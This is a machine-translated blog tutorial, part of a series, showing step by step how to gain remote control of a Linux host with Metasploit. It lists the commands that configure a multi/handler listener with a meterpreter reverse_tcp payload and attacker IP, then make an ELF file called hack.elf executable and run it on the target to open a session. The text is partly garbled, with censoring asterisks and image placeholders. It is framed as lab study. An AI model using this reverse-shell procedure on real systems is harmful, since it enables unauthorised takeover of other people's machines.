当前位置:网站首页>Network security engineer Demo: original * * controls your server like this! (2)

Network security engineer Demo: original * * controls your server like this! (2)

2020-11-10 07:39:00 osc_a8r2ub9u

Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Linux A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 start-up Metasploit(msf)*** The test framework , As shown in the figure below .
command 1:msfconsole
 Insert picture description here













step 1: Use the corresponding vulnerability to exploit the module , As shown in the figure below .
command 2:use exploit/multi/handler
 Insert picture description here

step 2: Check the parameters corresponding to the vulnerability module , As shown in the figure below .
command 3:show options
 Insert picture description here

step 3: Set the corresponding payload Convenient for follow-up ***, As shown in the figure below .
command :set payload linux/x86/meterpreter/reverse_tcp
 Insert picture description here

step 4: Check the relevant parameters of the vulnerability module , As shown in the figure below .
command :show options
 Insert picture description here

step 5: Set the corresponding parameters , As shown in the figure below .
command :set lhost 193.168.78.169
 Insert picture description here

step 6: Check whether the configured parameters are successful , As shown in the figure below .
command :show options
 Insert picture description here

3.2 function *** file , As shown in the figure below .
step 1: to *** The file gives execution permission , As shown in the figure below .
command :chmod +x hack.elf
 Insert picture description here


step 2: perform *** file , As shown in the figure below .
command :./hack.elf
 Insert picture description here

3.3 Run the exploit module , As shown in the figure below .
command :run
As shown in the figure below , Successfully captured the target host .
 Insert picture description here


View the file system information of the target host , As shown in the figure below .
 Insert picture description here
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !


版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢